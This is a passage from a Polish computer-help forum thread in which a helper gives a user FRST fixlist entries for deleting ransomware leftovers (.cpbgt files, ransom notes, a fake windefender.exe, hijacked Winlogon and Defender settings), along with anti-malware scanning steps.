    2019-01-26 19:13 - 2019-01-26 19:13 - 000008946 _____ C:\Users\CPBGT-DECRYPT.txt
    2019-01-26 19:13 - 2019-01-26 19:13 - 000008946 _____ C:\CPBGT-DECRYPT.txt
    2019-01-26 19:13 - 2019-01-26 19:13 - 000003226 _____ C:\Windows\System32\Tasks\Windows Defender
    2019-01-26 19:13 - 2019-01-26 19:13 - 000000000 ___HD C:\Users\cwk\AppData\Roaming\klogs
    2019-01-26 19:13 - 2019-01-26 19:13 - 000000000 ____D C:\ProgramData\PBURR8NUOYCLZ7H2N4MA
    2019-01-26 17:28 - 2019-01-26 17:28 - 001435136 ____H C:\Windows\windefender.exe
    2019-01-26 17:16 - 2019-01-26 17:16 - 000000000 ____D C:\Users\cwk\AppData\Roaming\EpicNet Inc
    2019-01-25 19:41 - 2019-01-25 19:41 - 000023272 _____ (Windows (R) Win 7 DDK provider) C:\Windows\system32\Drivers\WinmonFS.sys
    2019-01-25 19:41 - 2019-01-25 19:41 - 000009352 _____ C:\Windows\system32\Drivers\Winmon.sys
    2019-01-25 19:40 - 2019-01-26 19:13 - 006161948 _____ C:\Users\cwk\AppData\Local\dump007.dat.cpbgt
    2019-01-25 19:40 - 2019-01-25 19:41 - 005552360 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
    2019-01-25 19:40 - 2019-01-25 19:41 - 000634272 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
    2019-01-25 19:37 - 2019-01-31 16:20 - 000000000 ___HD C:\Windows\rss
    2019-01-25 19:37 - 2019-01-26 19:14 - 000006108 _____ C:\Users\cwk\AppData\Local\md.xml.cpbgt
    2019-01-25 19:37 - 2019-01-26 19:13 - 007859228 _____ C:\Users\cwk\AppData\Local\agent.dat.cpbgt
    2019-01-25 19:37 - 2019-01-26 19:13 - 001895923 _____ C:\Users\cwk\AppData\Local\DingTamtone.bin.cpbgt
    2019-01-25 19:37 - 2019-01-26 19:13 - 000071436 _____ C:\Users\cwk\AppData\Local\Config.xml.cpbgt
    2019-01-25 19:36 - 2019-01-26 19:14 - 000141340 _____ C:\Users\cwk\AppData\Local\installer.dat.cpbgt
    2019-01-23 17:23 - 2019-01-26 19:13 - 000000000 ____D C:\Users\cwk\AppData\Local\CrashRpt
    2019-01-02 18:51 - 2018-12-27 20:58 - 000000301 _____ C:\Users\cwk\d4ac4633ebd6440fa397b84f1bc94a3c.7z
    2019-01-26 19:13 - 2019-01-26 19:13 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
    2019-01-26 19:13 - 2019-01-26 19:13 - 000440120 _____ (Microsoft Corporation) C:\ProgramData\msvcp140.dll
    2019-01-26 19:13 - 2019-01-26 19:13 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
    2019-01-26 19:14 - 2019-01-26 19:14 - 000008946 _____ () C:\Program Files\CPBGT-DECRYPT.txt
    2019-01-26 19:14 - 2019-01-26 19:14 - 000008946 _____ () C:\Program Files (x86)\CPBGT-DECRYPT.txt
    2019-01-25 19:37 - 2019-01-26 19:13 - 007859228 _____ () C:\Users\cwk\AppData\Local\agent.dat.cpbgt
    2019-01-25 19:37 - 2019-01-26 19:13 - 000071436 _____ () C:\Users\cwk\AppData\Local\Config.xml.cpbgt
    2019-01-26 19:13 - 2019-01-26 19:13 - 000008946 _____ () C:\Users\cwk\AppData\Local\CPBGT-DECRYPT.txt
    2019-01-25 19:37 - 2019-01-26 19:13 - 001895923 _____ () C:\Users\cwk\AppData\Local\DingTamtone.bin.cpbgt
    2019-01-25 19:40 - 2019-01-26 19:13 - 006161948 _____ () C:\Users\cwk\AppData\Local\dump007.dat.cpbgt
    2019-01-25 19:36 - 2019-01-26 19:14 - 000141340 _____ () C:\Users\cwk\AppData\Local\installer.dat.cpbgt
    2019-01-25 19:37 - 2019-01-26 19:14 - 000006108 _____ () C:\Users\cwk\AppData\Local\md.xml.cpbgt
    C:\Users\cwk\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
    EmptyTemp:


    Po wykonaniu uzyj AdwCleaner, opcja Scan/Szukaj i Clean/Usun: http://www.bleepingcomputer.com/download/adwcleaner/

    Zrob pelny skan przy pomocy Mbam i usun to co wykryje:
    http://www.bleepingcomputer.com/download/malwarebytes-anti-malware/
    oraz http://ftp.drweb.com/pub/drweb/cureit/launch.exe

    Zamiesc nowe logi z FRST, ze skanowania.
  • #7
    cfirek
    Level 9  
    Na razie pierwsze dwa punkty, czyli screen no i problem od razu z odinstalowaniem programu. Jakieś propozycje jak to zrobić? Prosba o sprawdzenie logow z FRST
  • #8
    Kolobos
    IT specialist
    Mozesz pominac lub usunac recznie przy pomocy regedit, wyszukaj CloudNet i usun klucz z galezi uninstall.

    W msconfig ustaw Windows 7 jako domyslny, a Windows Fast Mode usun.
  • #10
    Kolobos
    IT specialist
    Kolejny Fixlist.txt:
    Task: {08B11FFC-5803-4E3F-885D-753D63CE185C} - \ScheduledUpdate -> Brak pliku <==== UWAGA
    Task: {1319D7A6-2613-4562-8966-016A871E6668} - \Windows Defender -> Brak pliku <==== UWAGA
    HKLM-x32\...\Winlogon: [Userinit]
    HKLM-x32\...\Winlogon: [Shell] [ ] () <=== UWAGA
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
    2019-01-31 21:05 - 2019-01-31 21:06 - 000000000 ____D C:\AdwCleaner

    Po wykonaniu usun katalog C:\FRST i to wszystko.